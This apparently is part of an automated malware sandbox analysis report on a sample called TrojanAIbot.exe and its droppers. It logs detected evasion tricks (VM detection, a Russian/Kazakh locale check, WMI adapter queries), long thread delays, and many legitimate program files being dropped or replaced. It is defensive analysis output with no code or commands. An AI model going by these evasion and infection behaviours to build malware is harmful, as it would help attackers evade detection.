Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 7324, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00B752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	12_2_00B752A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	28_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	29_2_022A52A0

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Memory allocated: 1FA4C910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 22B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 22E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 42E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 1480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2F50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 1480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 2E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 4FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 13B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 12B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2D30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 12A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2E50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4E50000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7143	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1763	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 5010
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7711
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1578
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 7011
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 2778

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
